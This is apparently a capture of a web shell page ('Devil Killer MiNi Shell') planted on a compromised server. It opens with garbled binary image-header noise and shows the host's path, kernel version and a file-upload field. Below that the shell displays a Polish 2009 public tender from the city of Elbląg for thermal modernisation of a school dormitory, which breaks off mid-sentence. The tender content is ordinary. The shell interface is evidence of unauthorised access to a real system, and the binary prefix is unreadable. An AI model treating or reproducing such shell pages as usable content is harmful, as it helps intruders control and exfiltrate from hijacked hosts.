JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090406/92286-N-2009.html

<p class="kh_header"><b>Elbląg: Termomodernizacja budynku Bursy Szkolnej Nr 3 przy ul. Wapiennej 17 w ramach Projektu: Termomodernizacja obiektów oświaty publicznej w Elblągu</b><br>
<b>Numer ogłoszenia: 92286 - 2009; data zamieszczenia: 06.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 235 35 36, 055 239 31 25, faks 055 235 35 55, 055 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Bursy Szkolnej Nr 3 przy ul. Wapiennej 17 w ramach Projektu: Termomodernizacja obiektów oświaty publicznej w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
	
Termomodernizacja budynku Bursy Szkolnej Nr 3 przy ul. Wapiennej 17 w ramach Projektu: Termomodernizacja obiektów oświaty publicznej w Elblągu

przedmiot główny:
nazewnictwo wg CPV:   Roboty budowlane w zakresie budynków wielofunkcyjnych

Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na termomodernizacji budynku Bursy Szkolnej Nr 3 przy ul. Wapiennej 17 w ramach Projektu: Termomodernizacja obiektów oświaty publicznej w Elblągu.
Zamawiający informuje, że Projekt jest dofinansowywany ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego.

2.	Przedmiot zamówienia opisuje niżej wymieniona dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych, opracowana przez Biuro Projektów Budownictwa Komunalnego Sp. z o. o. Przedsiębiorstwo Projektowo-Inwestycyjne z siedzibą w Elblągu przy 
ul. Wigilijnej 6-7 składająca się z:

A.	DOKUMENTACJA PROJEKTOWA:
	
1)  PRZEDMIARY ROBÓT

 a)  PRZEDMIAR - roboty budowlane
NAZWA INWESTYCJI : Termomodernizacja Obiektu Bursy Szkolnej Nr 3
ADRES INWESTYCJI :  ul. Wapienna 17; 82-300 Elbląg
INWESTOR : Gmina Miasto Elbląg
ADRES INWESTORA : ul. Łączności1 ; 82-300 Elbląg

	          b)  OBIEKT: REMONT BURSY SZKOLNEJ NR 3
		  ADRES: ELBLAG UL. WAPIENNA 17
  RODZAJ ROBOT : INSTALACJE ELEKTRYCZNE
  INWESTOR: GMINA-MIASTO ELBLAG UL. LACZNOSCI 1
	 
 c)  Nazwa zadania: Remont Bursy Szkolnej nr 3
	  Adres: Elbląg ul. Wapienna 17
		  Rodzaj robót: wentylacja

 d)  OBIEKT: REMONT BURSY SZKOLNEJ NR 3
		  ADRES: ELBLAG UL. WAPIENNA 17
  RODZAJ ROBOT : SIECI I PRZYL.KANALIZACJI SANITARNEJ  I DESZCZOWEJ
  INWESTOR: GMINA-MIASTO ELBLAG UL. LACZNOSCI 1
e)  Nazwa zadania: Remont Bursy Szkolnej nr 3
	  Adres: Elbląg ul. Wapienna 17
		  Rodzaj robót: inst.wewn.co

        Zamawiający informuje, że przedmiary robót wymienione w sekcji II.1.3)  pkt 2.A.1) stanowią 
        ZAŁĄCZNIK NR 5 do SIWZ.

                      2) PROJEKTY:
	   a) STADIUM: PB+PW
                          	Rodzaj opracowania:  PROJEKT BUDOWLANY - ROBOTY W ZAKRESIE 
					  ARCHITEKTONICZNYM
                          	Nazwa inwestycji: 	  Remont Bursy Szkolnej nr 3
	Adres inwestycji:	  Elbląg, ul. Wapienna 17
	Nazwa obiektu:	  Bursa Szkolna

	   b) STADIUM: PB+PW
                          	Rodzaj opracowania:  PROJEKT BUDOWLANY - KONSTRUKCJA
                          	Nazwa inwestycji: 	  Remont Bursy Szkolnej nr 3
	Adres inwestycji:	  Elbląg, ul. Wapienna 17
	Nazwa obiektu:	  Bursa Szkolna

		 c) STADIUM: PB+PW
                          	Rodzaj opracowania:  INSTALACJA WEWNĘTRZNA CENTRALNEGO OGRZEWANIA
                          	Nazwa inwestycji: 	  Remont Bursy Szkolnej nr 3
	Adres inwestycji:	  Elbląg, ul. Wapienna 17
	Nazwa obiektu:	  Bursa Szkolna

		 d) STADIUM: PB+PW
                          	Rodzaj opracowania:  WENTYLACJA
                          	Nazwa inwestycji: 	  Remont Bursy Szkolnej nr 3
	Adres inwestycji:	  Elbląg, ul. Wapienna 17
	Nazwa obiektu:	  Bursa Szkolna

	   e) STADIUM: PB+PW
                          	Rodzaj opracowania:  SANITARNE
                          	Nazwa inwestycji: 	  Remont Bursy Szkolnej nr 3
	Adres inwestycji:	  Elbląg, ul. Wapienna 17
	Nazwa obiektu:	  Sieci i przyłącza kanalizacji sanitarnej i deszczowej

	    f) STADIUM: PB+PW
                          	Rodzaj opracowania:  INSTALACJE ELEKTRYCZNE
                          	Nazwa inwestycji: 	  Remont Bursy Szkolnej nr 3
	Adres inwestycji:	  Elbląg, ul. Wapienna 17
	Nazwa obiektu:	  Bursa Szkolna

         Zamawiający informuje, że dokumentacja projektowa wymieniona w sekcji II.1.3) pkt 2.A.2)      
         stanowi ZAŁĄCZNIK NR 6 do SIWZ.
 
B.   SPECYFIKACJA TECHNICZNA WYKONANIA I ODBIORU ROBÓT BUDOWLANYCH:
	STADIUM: PB+PW
                      Rodzaj opracowania:  SPECYFIKACJE TECHNICZNE
                      Nazwa inwestycji: 	      Remont Bursy Szkolnej nr 3
	Adres inwestycji:	      Elbląg, ul. Wapienna 17
	Nazwa obiektu:	      Bursa Szkolna

         Zamawiający informuje, że specyfikacja techniczna wykonania i odbioru robót budowlanych, o 
	      której mowa w sekcji II.1.3) pkt 2.B. stanowi ZAŁĄCZNIK NR 7 do SIWZ.

3.	Zamawiający wymaga udzielenia przez Wykonawcę pisemnej gwarancji na okres 39 miesięcy dla całości robót licząc od daty odbioru końcowego.

4.	Zamawiający zaleca, aby Wykonawca przeprowadził wizję w terenie, w celu ustalenia wszelkich prac związanych z realizacją przedmiotu zamówienia.

5.	W przypadku dostarczenia zabezpieczenia należytego wykonania umowy w formie gwarancji, Zamawiający wymaga, aby były one zgodne ze wzorami stanowiącymi ZAŁĄCZNIK NR 4 do SIWZ.

6.	W przypadku wygrania przetargu Wykonawca sporządzi harmonogram rzeczowo-finansowy wykonania robót objętych zamówieniem i przedłoży do zatwierdzenia w terminie 5 dni od daty  zawarcia umowy.
Zakres i terminy robót, które będą wykonywane w okresie prowadzenia zajęć wychowawczych muszą być uzgodnione z użytkownikiem obiektu.

7.	W przypadku wygrania przetargu Wykonawca zobowiązany będzie do zawarcia umów z podwykonawcami, zgodnie z postanowieniami art. 6471 - Kodeksu Cywilnego.

8.	W przypadku wygrania przetargu Wykonawca zobowiązany będzie do zawarcia umów przelewu wierzytelności na rzecz podwykonawców, należnych im za wykonane roboty.

9.	W przypadku wygrania przetargu Wykonawca zobowiązany będzie do ubezpieczenia budowy od mogących wystąpić szkód, nagłych zdarzeń losowych oraz od odpowiedzialności cywilnej na okres od dnia rozpoczęcia do dnia ukończenia robót, obejmującego:
a)	ubezpieczenie robót, urządzeń i sprzętu budowlanego do wysokości 100% umownego wynagrodzenia,
b)	ubezpieczenie osób trzecich.

10.	Zamawiający wymaga, aby odpady powstałe w wyniku realizacji robót były przetransportowane i zmagazynowane w miejscu unieszkodliwiania odpadów. Wykonawca zobowiązany będzie do przedstawienia stosownych dokumentów.

11.	Informacja o przewidywanych zmianach postanowień zawartej umowy w stosunku do treści
 oferty, na podstawie której Zamawiający dokona wyboru Wykonawcy:
1)	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie której będzie dokonany wybór Wykonawcy.
2)	Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a.	Konieczność przedłużenia terminu umownego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności,
         - z przyczyn zależnych od Zamawiającego.
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof).
b.	Ograniczenie zakresu robót wynikające z braku środków finansowych Zamawiającego.
c.	Ograniczenie zakresu robót wynikających z wprowadzenia zmian istotnych lub nieistotnych 
w rozumieniu Prawa budowlanego.
d.	Konieczność wykonania dodatkowych badań, ekspertyz, analiz itp. 
e.	Konieczność wykonania robót zamiennych, niewykraczających poza zakres przedmiotu zamówienia, których wprowadzenie będzie konieczne dla wykonania całości robót 
i uzyskania założonego efektu użytkowego.
f.	Zmiana przepisów, które skutkują zmianą pozwolenia na budowę wydanego 
dla realizowanego zamówienia.
g.	Likwidacja lub rozwiązanie firmy Wykonawcy.
h.	Konieczność wykonania prac wynikających z zaleceń organów uprawnionych np. Nadzoru budowlanego, PIP itp. 
i.	Zwiększenie lub zmniejszenie ilości robót wynikające z rzeczywistych obmiarów.
j.	Zmiana inspektora nadzoru, kierownika budowy, kierownika robót, koordynatora prac 
ze strony Zamawiającego. 
k.	Zmiana Podwykonawców robót.
l.	Zmiana nr konta Wykonawcy lub innych danych podmiotowych.
m.	Ustawowa zmiana stawki VAT lub zmiana cen materiałów budowlanych w sytuacji łącznego spełnienia dwóch przesłanek: 
- gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej 
ze stron rażącą stratą w rozumieniu art. 3571 Kodeksu Cywilnego,
- zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia  umowy.
3)	W przypadku żądania przedłużenia terminu umownego z przyczyn zależnych od Wykonawcy, zostanie przeprowadzona następująca procedura:
- Wykonawca prześle Zamawiającemu projekt zmian do umowy (aneks) w terminie 
co najmniej 14 dni przed datą upływu terminu zakończenia umowy wraz z pisemnym uzasadnieniem,
-  Zamawiający udzieli pisemnej odpowiedzi lub odeśle podpisany aneks do umowy przed upływem terminu wykonania umowy.
4)	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy. 

12.	  Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających.

13.	W związku z tym, iż zamówienie jest współfinansowane ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego, Zamawiający wymaga aby Wykonawca realizował wytyczne dotyczące promocji i informacji na zadaniach realizowanych z udziałem funduszy Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego.  W szczególności dotyczy to obowiązku wykonania i umieszczenia przez Wykonawcę stosownych tablic: informacyjnej i pamiątkowej o zakresie realizowanego projektu i wsparcia Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego. Wzory tablic dostępne są pod linkiem :
http://www.eog.gov.pl/Realizacja%20projektow/Informacja%20i%20promocja/Strony/Informacja%20i%20promocja.aspx
Wykonawca przedstawi Zamawiającemu do akceptacji wzory tablic.

14.	Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.

15.	Zakres zamówienia.
Zakres robót obejmuje: 
a)	roboty termomodernizacyjne:
	- docieplenie i kolorystykę elewacji,
	- docieplenie stropodachów i pokrycie dachów,
	- wymianę stolarki okiennej,
	- modernizację grzejników z założeniem zaworów termostatycznych,
	- modernizację instalacji wewnętrznej c.o.,
	- modernizację instalacji wentylacyjnej,
b)	pozostałe roboty budowlane:
	- kanalizacja deszczowa,
	- instalacja elektryczna i odgromowa.
c)   wykonanie tablic: informacyjnej i pamiątkowej.

Szczegółowy zakres robót objętych zamówieniem określa dokumentacja projektowa stanowiąca ZAŁĄCZNIK NR 6 do SIWZ, a ilości robót do wykonania określają przedmiary robót stanowiące ZAŁĄCZNIK NR 5 do SIWZ.

Zamawiający wymaga złożenia oświadczenia wynikającego z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych o treści:
Zgodnie z art. 25 ust. 1 pkt 2) ustawy Prawo zamówień publicznych oświadczam, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.50-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:

10 000,00 zł (słownie: dziesięć tysięcy złotych)

Wadium należy wnieść przed upływem terminu składania ofert.

	Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
-  w pieniądzu, 
-  w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-  w gwarancjach bankowych, 
-  w gwarancjach ubezpieczeniowych, 
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109, poz. 1158, z późn. zm.).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy

NR  95116022020000000061913418   w  Banku Millennium S.A. O / Elbląg

Wadium wnoszone w innej formie niż w pieniądzu należy zdeponować w sekretariacie Wydziału Finansowo - Budżetowego Urzędu Miejskiego w Elblągu.

2.	Wykonawca, który nie wniesie wadium zostanie przez Zamawiającego wykluczony z postępowania.
3.	Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.	Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełniający warunki art. 22 ust. 1 tj. Wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
     Warunkiem udziału w postępowaniu jest:
a)	wykonanie w sposób należyty w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 5 robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, tj. robót polegających na termomodernizacji, budowie lub przebudowie obiektu użyteczności publicznej, obiektu mieszkalnego lub mieszkalno-usługowego, w tym:
- co najmniej 1 roboty budowlanej o kubaturze minimum 4 000 m3,
- co najmniej 1 roboty budowlanej o wartości minimum 1 000 000,00 zł netto wykonanej w okresie  
	maksymalnie 10 tygodni,

b)   zatrudnianie przeciętnie w okresie ostatnich trzech lat minimum 30 pracowników,

c)   dysponowanie kierownikiem budowy branży ogólnobudowlanej ze stażem łącznym pracy jako 
kierownik budowy minimum 3 lata oraz kierownikami robót branżowych tj. robót elektrycznych i sanitarnych, z których każdy ma łączny staż pracy jako kierownik robót minimum 2 lata.
Kierownik budowy i kierownicy robót muszą posiadać wymagane uprawnienia budowlane i być członkami właściwych izb samorządu zawodowego.

Zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane, samodzielne funkcje techniczne w budownictwie, m.in. kierowanie budową lub innymi robotami budowlanymi, mogą wykonywać wyłącznie osoby posiadające wymagane uprawnienia budowlane, będące członkami właściwych izb samorządu zawodowego (tekst jednolity: Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zm.).

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. SIWZ
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VI. ppkt 1.4. SIWZ  
Przy ocenie spełnienia tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt c) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.5., 1.6.  i 1.7. SIWZ  

5) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ogłoszenia Zamawiający dokona na   podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ

6) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na   podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-   zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-   zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-  zgodnie z pkt VI. ppkt 1.3. SIWZ - Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów potwierdzających, że roboty te zostały wykonane należycie.
Uwaga:
a)	W wykazie należy wymienić roboty potwierdzające spełnienie przez Wykonawcę warunku określonego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia.
b)	W przedmiocie zamówienia należy podać informację o wielkości kubatury i rodzaju obiektu.
c)	W informacji dotyczącej daty wykonania należy podać czas realizacji w tygodniach.
d)	Dla robót wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te roboty zostały wykonane należycie.
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia.

-  zgodnie z pkt VI. ppkt 1.4. SIWZ - Informacji na temat przeciętnej liczby zatrudnionych pracowników w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia 

-   zgodnie z pkt VI. ppkt 1.5. SIWZ - Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i 
które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Uwaga:
a)	Na potwierdzenie spełniania warunku określonego w Sekcji III.2) pkt 2. ppkt c) ogłoszenia w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W doświadczeniu kierownika budowy branży ogólnobudowlanej należy podać łączną liczbę lat stażu pracy jako kierownik budowy.
c)	W doświadczeniu kierowników robót branżowych, tj. robót elektrycznych i sanitarnych należy podać odpowiednio:
-  łączną liczbę lat stażu pracy jako kierownik robót elektrycznych,
-  łączną liczbę lat stażu pracy jako kierownik robót sanitarnych.
d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.6. SIWZ - Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował.
Uwaga:
a)	 Dokumenty składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował  
      na podstawie pisemnego zobowiązania innych podmiotów.
b)	 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony 
